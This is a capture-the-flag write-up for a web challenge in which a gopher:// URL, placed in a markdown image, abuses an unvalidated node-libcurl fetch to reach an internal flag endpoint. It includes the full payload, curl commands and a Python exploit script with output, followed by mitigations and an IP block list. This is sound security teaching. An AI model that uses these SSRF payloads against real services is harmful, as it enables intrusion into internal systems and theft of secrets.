Amazon AppSec CTF: PageOneHTML

Executive Summary

  • Challenge: PageOneHTML
  • Category: Web Security
  • Vulnerability: Server-Side Request Forgery (SSRF) via gopher:// protocol
  • Impact: Access to internal API endpoint leading to flag disclosure
  • Flags:
    • Local: HTB{f4k3_fl4g_f0r_t3st1ng}
    • Remote: HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}

Source-to-Sink Analysis

1. Entry Point - User Input (Source)

The vulnerability starts at the /api/convert endpoint, which accepts user-controlled markdown content:

// routes/index.js:15-28
router.post('/api/convert', async (req, res) => {
    const { markdown_content, port_images } = req.body;  // User input

    if (markdown_content) {
        html = MDHelper.makeHtml(markdown_content);      // Convert MD to HTML
        if (port_images) {                               // If port_images is true
            return ImageConverter.PortImages(html)       // Process images
                .then(newHTML => res.json({ content: newHTML }))
                .catch(() => res.json({ content: html }));
        }
        return res.json({ content: html });
    }
    return res.status(403).send(response('Missing parameters!'));
});

2. Image Processing - Protocol Confusion

The ImageConverter extracts all <img> tags and processes their src attributes:

// helpers/ImageConverter.js:5-28
module.exports = {
    PortImages(html) {
        return new Promise(async (resolve, reject) => {
            try {
                const $ = cheerio.load(html);
                function downloader(el) {
                    imgSrc = $(el).attr('src');  // Extract src attribute
                    return Promise.resolve(ImageDownloader.downloadImage(imgSrc));
                }
                Promise.all(
                    $('img')
                    .map(async (i, el) => {
                        newSrc = await downloader(el);  // Download and convert
                        $(el).attr('src', newSrc)       // Replace with data URI
                    })
                    .get()
                ).then(() => {
                    return resolve($.html());
                })
            } catch (e) {
                console.log(e);
                reject(e);
            }
        });
    }
};

3. The Vulnerable Sink - libcurl Protocol Support

The critical flaw is in ImageDownloader.js, which passes the URL to node-libcurl without validating its protocol:

// helpers/ImageDownloader.js:29-49
module.exports = {
    async downloadImage(url) {
        return new Promise(async (resolve, reject) => {
            curly.get(url)  // VULNERABILITY: Accepts any protocol supported by libcurl
                .then(resp => {
                    buffer = Buffer.from(resp.data,'utf8')
                    if (isPng(buffer))
                        dataUri = "data:image/png;base64,";
                    else if (isJpg(buffer))
                        dataUri = "data:image/jpg;base64,";
                    else
                        dataUri = "data:image/svg+xml;base64";  // Non-images treated as SVG
                    return resolve(`${dataUri} ${buffer.toString('base64')}`);  // Leak response
                })
                .catch(e => {
                    console.log(e)
                    return resolve(url);
                })
        });
    }
};

Key vulnerabilities:

  1. curly.get(url) accepts ANY protocol supported by libcurl (http, https, ftp, gopher, dict, file, etc.)
  2. Non-image responses are base64-encoded and returned, leaking their content
  3. No URL validation or protocol allowlisting
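
To make the leak concrete, here is a minimal Python sketch that mirrors the fallback branch of downloadImage. The magic-byte checks only approximate what isPng and isJpg do, and the function name to_data_uri is an assumption made for illustration. It shows that any non-image body, such as an HTTP response from an internal service, comes back as trivially decodable base64.

```python
import base64

# Approximate signatures; the real isPng/isJpg helpers may check more bytes
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPG_MAGIC = b"\xff\xd8\xff"


def to_data_uri(body: bytes) -> str:
    """Mimic downloadImage: pick a prefix, then append the base64 body."""
    if body.startswith(PNG_MAGIC):
        prefix = "data:image/png;base64,"
    elif body.startswith(JPG_MAGIC):
        prefix = "data:image/jpg;base64,"
    else:
        # Everything else is labelled SVG and returned anyway
        prefix = "data:image/svg+xml;base64"
    return f"{prefix} {base64.b64encode(body).decode()}"


# A non-image body, shaped like the internal endpoint's reply
leaked = to_data_uri(b"HTTP/1.1 200 OK\r\n\r\nHTB{f4k3_fl4g_f0r_t3st1ng}\n")
encoded = leaked.split(" ", 1)[1]
print(base64.b64decode(encoded).decode())
```

Decoding the part after the space recovers the original bytes unchanged, which is why the extraction commands later in this writeup split on "base64 ".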

4. The Target - Internal API Endpoint

The internal /api/dev endpoint is protected only by a source-IP check and a hardcoded API key:

// routes/index.js:30-38
router.get('/api/dev', async (req, res) => {
    // Only allow requests from localhost
    if (req.ip != '127.0.0.1') return res.status(403).send(response('Access denied!'));

    if (req.headers["x-api-key"] == "934caf984a4ca94817ea6d87d37af4b3") {
        return res.send(execSync('./flagreader.bin').toString());  // Flag!
    }
    return res.status(403).send(response('missing apikey!'));
});

Exploit Chain

Exploit Flow Diagram

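Attacker POST to /api/convert -> MDHelper.makeHtml -> ImageConverter.PortImages -> ImageDownloader.downloadImage -> curly.get(gopher://127.0.0.1:1337/...) -> GET /api/dev from 127.0.0.1 -> flag returned as a base64 data URI in the img src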

Payload Construction

Step 1: Craft the Raw HTTP Request

We need to send this HTTP request to the internal endpoint:

GET /api/dev HTTP/1.1
Host: 127.0.0.1
x-api-key: 934caf984a4ca94817ea6d87d37af4b3
Connection: close

Step 2: Convert to Gopher URL

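A gopher URL has the form gopher://host:port/_<data>. libcurl opens a TCP connection to host:port and sends the URL-decoded <data> over it, which lets us smuggle a complete HTTP request:

  • URL-encode spaces as %20
  • URL-encode CRLF as %0D%0A, and end the request with a blank line (%0D%0A%0D%0A)
  • Prefix the data with a single placeholder character (here _); libcurl treats the first character of the path as the gopher item type and does not send it

gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A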
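
The encoding rules above can be automated. The following is a small sketch, not part of the original tooling; the helper name build_gopher_url is an assumption. It normalises line endings to CRLF, appends the terminating blank line, and percent-encodes everything except the characters the hand-written URL leaves readable.

```python
from urllib.parse import quote


def build_gopher_url(host: str, port: int, raw_request: str) -> str:
    """Wrap a raw HTTP request in a gopher:// URL for libcurl."""
    # HTTP requires CRLF line endings and a blank line after the headers
    lines = raw_request.strip().splitlines()
    data = "\r\n".join(lines) + "\r\n\r\n"
    # Keep '/' and ':' readable; spaces, CR and LF become %20, %0D, %0A
    encoded = quote(data, safe="/:")
    # '_' fills the gopher item-type slot, which libcurl strips
    return f"gopher://{host}:{port}/_{encoded}"


request = """GET /api/dev HTTP/1.1
Host: 127.0.0.1
x-api-key: 934caf984a4ca94817ea6d87d37af4b3
Connection: close"""

url = build_gopher_url("127.0.0.1", 1337, request)
print(url)
```

For the request from Step 1 this reproduces the gopher URL shown above character for character.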

Step 3: Embed in HTML Image Tag

<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">

Exploitation

Local Testing (Docker Container)

  1. Send the exploit payload:
curl -s http://127.0.0.1:1337/api/convert \
  -H 'Content-Type: application/json' \
  --data-binary '{
    "markdown_content": "<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">",
    "port_images": true
  }'
  2. Extract and decode the base64 response:
curl -s http://127.0.0.1:1337/api/convert \
  -H 'Content-Type: application/json' \
  --data-binary '{"markdown_content":"<img src=\"gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A\">","port_images":true}' \
  | jq -r .content \
  | sed -n 's/.*base64 \(.*\)".*/\1/p' \
  | tr -d '\n' \
  | base64 -d

Local Output:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 27
Date: Thu, 11 Sep 2025 14:46:35 GMT
Connection: close

HTB{f4k3_fl4g_f0r_t3st1ng}

Remote Exploitation

Python exploit script:

import json
import re
import base64
import urllib.request

# Target URL
url = "http://94.237.53.82:31404/api/convert"

# Gopher SSRF payload
payload = {
    "markdown_content": '<img src="gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0Ax-api-key:%20934caf984a4ca94817ea6d87d37af4b3%0D%0AConnection:%20close%0D%0A%0D%0A">',
    "port_images": True
}

# Send request
req = urllib.request.Request(
    url,
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"}
)

# Get response
response = urllib.request.urlopen(req, timeout=15).read().decode()
obj = json.loads(response)

# Extract base64 from data URI
content = obj.get("content", "")
match = re.search(r"base64\s+([A-Za-z0-9+/=\n\r]+)", content)

if match:
    b64_data = match.group(1).replace("\n", "").replace("\r", "")
    decoded = base64.b64decode(b64_data).decode()
    print(decoded)

Remote Output:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 35
Date: Thu, 11 Sep 2025 14:47:34 GMT
Connection: close

HTB{l1bcurL_pla7h0r4_0f_pr0tocOl5}
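
When scripting the attack, the flag can be pulled out of the decoded response instead of printing the whole HTTP message. A minimal sketch follows, assuming the flag always has the HTB{...} form seen in both outputs; the helper name extract_flag is hypothetical.

```python
import re
from typing import Optional


def extract_flag(decoded_response: str) -> Optional[str]:
    """Return the first HTB{...} token in the response body, if any."""
    # Headers and body are separated by the first blank line
    _headers, _sep, body = decoded_response.partition("\r\n\r\n")
    match = re.search(r"HTB\{[^}]+\}", body)
    return match.group(0) if match else None


sample = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Connection: close\r\n"
    "\r\n"
    "HTB{f4k3_fl4g_f0r_t3st1ng}\n"
)
print(extract_flag(sample))
```

A 403 reply from the endpoint contains no such token, so the function returns None and the script can report the failure explicitly.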

Root Cause Analysis

Vulnerability Chain

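User-controlled img src -> no protocol allowlist -> libcurl speaks gopher:// -> request originates from 127.0.0.1 -> hardcoded API key accepted -> non-image response base64-encoded into the reply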

Security Issues Identified

  1. Protocol Confusion - URLs are passed to node-libcurl unvalidated, so every protocol libcurl supports is reachable
  2. SSRF - No destination validation or egress filtering; loopback addresses are accepted
  3. Response Leakage - Non-image responses are base64-encoded and returned to the caller
  4. Weak Access Control - Internal endpoint trusts the loopback source IP, which any server-side request satisfies
  5. Static Credentials - API key hardcoded in source code

Mitigation Recommendations

1. Protocol Allowlisting

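// Example fix for ImageDownloader.js
const ALLOWED_PROTOCOLS = ['http:', 'https:'];

module.exports = {
    async downloadImage(url) {
        let parsedUrl;
        try {
            parsedUrl = new URL(url);  // Throws TypeError on malformed input
        } catch (e) {
            return url;                // Leave the src untouched, like the existing error path
        }
        if (!ALLOWED_PROTOCOLS.includes(parsedUrl.protocol)) {
            return url;                // Never hand non-HTTP(S) URLs to libcurl
        }
        // Defense in depth: also restrict libcurl itself via
        // CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS
        // ... rest of the code
    }
};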

2. SSRF Protection

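// Block internal networks (net.BlockList requires Node.js 15+)
const net = require('net');
const dns = require('dns').promises;

const BLOCKED_IPS = new net.BlockList();
BLOCKED_IPS.addSubnet('127.0.0.0', 8, 'ipv4');     // Loopback
BLOCKED_IPS.addSubnet('10.0.0.0', 8, 'ipv4');      // Private network
BLOCKED_IPS.addSubnet('172.16.0.0', 12, 'ipv4');   // Private network
BLOCKED_IPS.addSubnet('192.168.0.0', 16, 'ipv4');  // Private network
BLOCKED_IPS.addSubnet('169.254.0.0', 16, 'ipv4');  // Link-local
BLOCKED_IPS.addSubnet('fd00::', 8, 'ipv6');        // IPv6 private
BLOCKED_IPS.addAddress('::1', 'ipv6');             // IPv6 loopback

// Resolve the hostname and report whether any resulting address is blocked.
// libcurl resolves again at request time, so pin the validated address
// (or re-check after connecting) to avoid DNS rebinding.
async function isInternalIP(hostname) {
    const records = await dns.lookup(hostname, { all: true });
    return records.some(({ address, family }) =>
        BLOCKED_IPS.check(address, family === 6 ? 'ipv6' : 'ipv4'));
}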
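
The two checks above (protocol allowlist and internal-address blocking) can be combined into a single gate and tested against the exploit URL. The Python sketch below is an illustration only: the names is_safe_url and resolve_all are assumptions, and it relies on the standard ipaddress classification rather than an explicit CIDR list.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host: str) -> list:
    """Return every address for host; IP literals skip DNS entirely."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_url(url: str) -> bool:
    """Accept only http(s) URLs whose host resolves to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        addresses = resolve_all(parts.hostname)
    except socket.gaierror:
        return False  # Unresolvable hosts are rejected
    for addr in addresses:
        ip = ipaddress.ip_address(addr.split("%")[0])  # Drop any zone id
        # Unwrap IPv4-mapped IPv6 such as ::ffff:127.0.0.1
        mapped = getattr(ip, "ipv4_mapped", None)
        if mapped is not None:
            ip = mapped
        if ip.is_loopback or ip.is_private or ip.is_link_local:
            return False
    return True


payload = "gopher://127.0.0.1:1337/_GET%20/api/dev%20HTTP/1.1%0D%0A"
print(is_safe_url(payload))
print(is_safe_url("http://127.0.0.1:1337/api/dev"))
```

Both calls are rejected: the first by the scheme check, the second by the loopback check. As with the JavaScript version, the address should be re-validated or pinned at connection time, because a second DNS lookup may return a different result.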

3. Content Type Validation

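// Strict image validation (sketch using the global fetch in Node 18+, which only handles http/https)
async function downloadImage(url) {
    const response = await fetch(url);
    const contentType = response.headers.get('content-type');

    // Content-Type is server-controlled, so treat it as a first filter only
    if (!contentType?.startsWith('image/')) {
        throw new Error('Not an image');
    }

    // Global fetch has no response.buffer(); build a Buffer from the ArrayBuffer
    const buffer = Buffer.from(await response.arrayBuffer());
    // isSvg is an assumed helper; the code shown earlier only uses isPng and isJpg
    if (!isPng(buffer) && !isJpg(buffer) && !isSvg(buffer)) {
        throw new Error('Invalid image format');
    }
    // ... process valid image
}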

4. Remove Internal Debug Endpoints

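  • Remove the /api/dev endpoint from production builds
  • Use proper authentication mechanisms (OAuth, JWT) instead of a source-IP check
  • Load secrets from the environment or a secret store rather than hardcoding them
  • Implement rate limiting and monitoring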

Timeline

  1. Initial Analysis - Code review reveals SSRF vector via node-libcurl
  2. Protocol Testing - Confirmed gopher:// protocol support
  3. Payload Development - Crafted gopher URL with HTTP request
  4. Local Exploitation - Retrieved test flag from Docker environment
  5. Remote Exploitation - Successfully extracted production flag

Lessons Learned

  1. Never trust user input - All URLs should be validated
  2. Principle of least privilege - Use minimal protocol support
  3. Defense in depth - Multiple security layers needed
  4. Secure defaults - Libraries should be configured securely
  5. Regular security audits - Third-party dependencies need review
